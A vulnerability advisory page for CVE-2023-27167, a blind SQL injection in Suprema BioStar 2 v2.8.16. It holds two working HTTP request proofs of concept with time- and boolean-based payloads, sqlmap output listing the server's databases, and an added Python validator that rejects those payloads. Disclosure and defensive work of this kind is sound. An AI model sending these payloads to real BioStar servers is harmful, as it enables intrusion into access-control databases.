Suprema BioStar 2 2.8.16 SQL Injection

Published: 27 Mar 2023 00:00:00 | Reported by: Yuriy Tsarenko | Type: packetstorm | Source: packetstormsecurity.com | 238 views

Suprema BioStar 2 2.8.16 SQL Injection (CVE-2023-27167) allows remote attackers to execute arbitrary SQL commands.

Related

| Family | Title | Published |
|---|---|---|
| 0day.today (zdt) | Suprema BioStar 2 v2.8.16 - SQL Injection Vulnerability | 8 Apr 2023 00:00 |
| Circl (circl) | CVE-2023-27167 | 29 Mar 2023 20:20 |
| CNNVD (cnnvd) | Suprema BioStar 2 SQL Injection Vulnerability | 29 Mar 2023 00:00 |
| CVE (cve) | CVE-2023-27167 | 29 Mar 2023 00:00 |
| Cvelist (cvelist) | CVE-2023-27167 | 29 Mar 2023 00:00 |
| Exploit DB (exploitdb) | Suprema BioStar 2 v2.8.16 - SQL Injection | 8 Apr 2023 00:00 |
| EUVD (euvd) | EUVD-2023-30947 | 3 Oct 2025 20:07 |
| ICS (ics) | Suprema BioStar 2 | 26 Sep 2023 06:00 |
| NVD (nvd) | CVE-2023-27167 | 29 Mar 2023 17:15 |
| OSV (osv) | CVE-2023-27167 | 29 Mar 2023 17:15 |
# Exploit Title: CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection  
# Date: 26/03/2023  
# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)  
# Vendor Homepage: https://www.supremainc.com/  
# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp  
# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide  
# Version: 2.8.16  
# Tested on: Windows, Linux  
  
## Description   
A Boolean-based and time-based blind SQL injection vulnerability in the page /api/users/absence?search_month=1 in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute arbitrary SQL commands through the "values" JSON parameter.   
  
## Request PoC #1  
```http
POST /api/users/absence?search_month=1 HTTP/1.1  
Host: biostar2.server.net  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
content-type: application/json;charset=UTF-8  
content-language: en  
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548  
Content-Length: 204  
Origin: https://biostar2.server.net  
Connection: close  
Referer: https://biostar2.server.net/  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}  
  
```

Time-based SQL injection (with sleep(4) in the payload, the response is delayed by 8 seconds).
  
## Request PoC #2  
```http
POST /api/users/absence?search_month=1 HTTP/1.1  
Host: biostar2.server.net  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
content-type: application/json;charset=UTF-8  
content-language: en  
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548  
Content-Length: 188  
Origin: https://biostar2.server.net  
Connection: close  
Referer: https://biostar2.server.net/  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}  
  
```

Boolean-based SQL injection (the payload “1 and 3523=03523” evaluates to “1 and True”, so the response returns information about the user with id 1, which is the admin).
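The root cause described above is that strings supplied in the "values" array reach the SQL engine unchanged, so both PoC bodies are accepted where only integer ids make sense. The following is an added defender-side example, not code from the advisory or from Suprema: a server-side validator that enforces a column whitelist and per-column value types on the request body, and a builder that turns an accepted body into a parameterised statement. The two PoC bodies are embedded as constructed samples; the column whitelist, the SQL table and column names (`absence`, `user_group_id`) and the rule that every value for an `*.id` column must be an integer are assumptions made for this example.

```python
"""Server-side validation and parameterisation for the /api/users/absence filter body.

Added example, not code from the advisory or from Suprema. It assumes the JSON
shape shown in the PoC requests: a "Query" object whose "conditions" entries
carry a "column", an "operator" and a list of "values". The column whitelist,
the SQL table/column names and the rule that every value for an "*.id" column
must be an integer are assumptions made for this example only.
"""
import json

# Constructed sample bodies, in the shape of the two PoC requests above.
POC1_BODY = (
    '{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":'
    '[{"column":"user_group_id.id","operator":2,"values":'
    '["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}'
)
POC2_BODY = (
    '{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":'
    '[{"column":"user_group_id.id","operator":2,"values":'
    '["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}'
)
BENIGN_BODY = (
    '{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":'
    '[{"column":"user_group_id.id","operator":2,"values":[1,4840,20120]}],'
    '"orders":[],"total":false}}'
)

# Assumed whitelist: API column name -> (SQL column, required Python type).
# Anything not listed here never reaches SQL, so attacker-chosen column names
# cannot be spliced into the statement either.
ALLOWED_COLUMNS = {
    "user_group_id.id": ("user_group_id", int),
}


def _is_int(value) -> bool:
    # bool is a subclass of int in Python, so reject it explicitly.
    return isinstance(value, int) and not isinstance(value, bool)


def validate_query(body: str) -> list[str]:
    """Return the problems found in a request body; an empty list means it is safe to bind."""
    problems: list[str] = []
    try:
        doc = json.loads(body)
    except json.JSONDecodeError as exc:
        return [f"body is not valid JSON: {exc.msg}"]
    query = doc.get("Query") if isinstance(doc, dict) else None
    if not isinstance(query, dict):
        return ["missing Query object"]
    for key, default in (("offset", 0), ("limit", 50)):
        value = query.get(key, default)
        if not _is_int(value) or value < 0:
            problems.append(f"{key} must be a non-negative integer, got {value!r}")
    conditions = query.get("conditions", [])
    if not isinstance(conditions, list):
        return problems + ["conditions is not a list"]
    for idx, cond in enumerate(conditions):
        column = cond.get("column") if isinstance(cond, dict) else None
        if column not in ALLOWED_COLUMNS:
            problems.append(f"condition {idx}: column {column!r} not allowed")
            continue
        _, required = ALLOWED_COLUMNS[column]
        values = cond.get("values", [])
        if not isinstance(values, list):
            problems.append(f"condition {idx}: values is not a list")
            continue
        for value in values:
            # Both PoC payloads fail here: a string arrives where an int is required.
            ok = _is_int(value) if required is int else isinstance(value, required)
            if not ok:
                problems.append(f"condition {idx}: value {value!r} is not {required.__name__}")
    return problems


def build_safe_statement(body: str) -> tuple[str, tuple]:
    """Turn a validated body into (sql, params) with every user value as a bind parameter.

    The %s placeholder is the paramstyle of MySQL DB-API drivers such as PyMySQL
    and mysqlclient; the driver, not string formatting, transmits the values.
    """
    problems = validate_query(body)
    if problems:
        raise ValueError("; ".join(problems))
    query = json.loads(body)["Query"]
    clauses: list[str] = []
    params: list = []
    for cond in query.get("conditions", []):
        sql_column, _ = ALLOWED_COLUMNS[cond["column"]]
        values = cond.get("values", [])
        if not values:
            continue
        clauses.append(f"{sql_column} IN ({', '.join(['%s'] * len(values))})")
        params.extend(values)
    where = " AND ".join(clauses) or "1=1"
    # Table and column names are placeholders; the real schema is not in the advisory.
    sql = f"SELECT user_id, name FROM absence WHERE {where} LIMIT %s OFFSET %s"
    params.extend([query.get("limit", 50), query.get("offset", 0)])
    return sql, tuple(params)


if __name__ == "__main__":
    for label, body in (("PoC #1", POC1_BODY), ("PoC #2", POC2_BODY), ("benign", BENIGN_BODY)):
        print(label, "->", validate_query(body) or "accepted")
    print(build_safe_statement(BENIGN_BODY))
```

Run stand-alone, the script reports both PoC bodies as rejected (a string where an integer id is required) and prints the parameterised statement for the benign body. The same `validate_query` output is also usable as a detection signal: a non-integer value for an id column in this endpoint's filter is a reasonable thing to alert on in web server or API gateway logs, independently of whether the application itself has been patched.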
  
## Exploit with SQLmap  
  
Save the request from Burp Suite to a file.  
  
```
---  
Parameter: JSON #1* ((custom) POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}  
---  
[05:02:49] [INFO] testing MySQL  
[05:02:49] [INFO] confirming MySQL  
[05:02:50] [INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL > 5.0.0 (MariaDB fork)  
[05:02:50] [INFO] fetching database names  
[05:02:50] [INFO] fetching number of databases  
[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval  
[05:02:55] [INFO] retrieved: 2  
[05:03:12] [INFO] retrieved: biostar2_ac  
[05:03:56] [INFO] retrieved: information_schema  
available databases [2]:  
[*] biostar2_ac  
[*] information schema  
  
```

Published: 27 Mar 2023 00:00 (current) | Risk score: 6.5 (Medium) | Vulners AI Score: 6.5 | EPSS: 0.00575 | 238 views